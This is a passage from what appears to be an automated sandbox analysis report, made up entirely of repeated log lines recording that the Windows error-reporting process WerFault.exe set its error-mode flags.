                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
